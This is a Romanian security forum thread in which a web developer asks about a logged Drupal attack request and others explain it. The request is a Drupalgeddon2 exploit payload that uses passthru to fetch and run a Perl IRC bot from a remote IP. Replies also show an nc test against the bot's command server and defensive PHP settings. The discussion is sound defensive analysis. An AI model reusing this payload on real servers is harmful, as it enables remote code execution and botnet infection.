Mihaii8 Posted November 24, 2018 Report Posted November 24, 2018 Sunt pasionat de securitate in ultima vreme si putin ingrijorat .. Vin cu o intrebare pentru ca nu am reusit sa inteleg ce anume face acest script pe care l-am executat cand am facut decode, am vazut ulterior ca era redirectionat catre perl .. a venit ca un POST pe o aplicatie de drupal /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=wget+-qO+-+217.61.110.181%2Fqwe%7Cperl&name%5B%23type%5D=markup Poate cineva sa ma ajute sa inteleg ce face acest script perl ? Multumesc, Quote
Nytro Posted November 24, 2018 Report Posted November 24, 2018 Pare sa fie o vulnerabilitate Remote Command Execution. Daca e Drupal, poate sa fie Drupalgedon. 1 1 Quote
aelius Posted November 24, 2018 Report Posted November 24, 2018 Incearca daca este prezenta o vulnerabilitate in drupal si executa prin functia passthru (php) doua comenzi: - Descarca un script perl care este un bot de IRC utilizat pentru scanning, dos - Executa acel script Vulnerabilitatea despre care este vorba este aici: https://www.drupal.org/sa-core-2018-002 Serverul de IRC ruleaza pe adresa ip 82.165.172.97 / port 8080 # quick test macbook:~$ nc -vvvv 82.165.172.97 8080 found 0 associations found 1 connections: 1: flags=82<CONNECTED,PREFERRED> outif en0 src 10.0.0.31 port 55610 dst 82.165.172.97 port 8080 rank info not available TCP aux info available Connection to 82.165.172.97 port 8080 [tcp/http-alt] succeeded! :irc.roirc.me NOTICE AUTH :*** Looking up your hostname... :irc.roirc.me NOTICE AUTH :*** Found your hostname (cached) Botul de irc nu are autentificare si tine cont doar de nick-ul celui ce da comenzile: my @mast3rs = ("darkness","QuaD","AntMiner"); Procesul ce ruleaza in server apare ca "/usr/sbin/sshd". Singura diferenta este ca ruleaza pe userul sub care se executa php/apache my @fakeps = ("/usr/sbin/sshd"); Scriptul perl e facut de portughezi prin 2001. A fost modificat in timp de tot felul de script kiddie. 1 6 Quote
Mihaii8 Posted November 25, 2018 Author Report Posted November 25, 2018 (edited) Marfa, pot sa stau linistit, am ultimul patch (si chiar asa, tot nu pot sa stau). Multumesc mult pentru explicatii. As vrea sa invat sa securizez mai mult aplicatiile web pe care le dezvolt pentru ca incep sa apara din ce in ce mai multe loguri dubioase.. Edited November 25, 2018 by Mihaii8 Quote
aelius Posted November 25, 2018 Report Posted November 25, 2018 22 hours ago, Mihaii8 said: Marfa, pot sa stau linistit, am ultimul patch (si chiar asa, tot nu pot sa stau). Multumesc mult pentru explicatii. As vrea sa invat sa securizez mai mult aplicatiile web pe care le dezvolt pentru ca incep sa apara din ce in ce mai multe loguri dubioase.. Foloseste "disable_functions" si "open_basedir" in environmentul din care servesti site-ul web. Te scapa in mare parte de diverse chestii de genul. Ai putea face si un chroot. Quote
aelius Posted November 26, 2018 Report Posted November 26, 2018 8 hours ago, .zife said: bre, cum ii dai nc? fara diez? ce diez? Quote
Mihaii8 Posted November 27, 2018 Author Report Posted November 27, 2018 On 11/26/2018 at 1:10 AM, aelius said: Foloseste "disable_functions" si "open_basedir" in environmentul din care servesti site-ul web. Te scapa in mare parte de diverse chestii de genul. Ai putea face si un chroot. @aelius era deja disable_functions = pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig, pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror, pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals, insa am mai adaugat phpinfo,dir,readfile,shell_exec,exec,virtual,passthru,proc_close,proc_get_status,proc_open,proc_terminate,system,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source am pus si open_basedir in fiecare vhost ..mersi de pont Quote
.zife Posted December 2, 2018 Report Posted December 2, 2018 (edited) On 11/26/2018 at 5:15 PM, aelius said: ce diez? macbook:~$ nc -vvvv Edited December 2, 2018 by .zife Quote
aelius Posted December 2, 2018 Report Posted December 2, 2018 @.zife Nu inteleg despre ce este vorba. Unde ar trebui sa fie diez? Quote
Active Members Fi8sVrs Posted December 3, 2018 Active Members Report Posted December 3, 2018 12 hours ago, .zife said: macbook:# nc -vvvv Aici Quote
aelius Posted December 3, 2018 Report Posted December 3, 2018 Ala e bash prompt, nu are legatura cu comanda executata. Pe user apare '$' iar pe superuser '#'. Nu ai nevoie de superuser pentru a initializa conexiuni cu netcat. La listare se schimba putin treaba pentru ca pot fi restrictii diverse pentru porturile mai mici de 1024 (privileged ports) Nu utilizati superuser (root) pentru "daily work". Il folositi doar daca aveti de facut chestii administrative in sistem. Este unsafe. Referinte: - http://man7.org/linux/man-pages/man7/capabilities.7.html ( CAP_NET_BIND_SERVICE ) - https://tiswww.case.edu/php/chet/bash/bashref.html 2 2 Quote
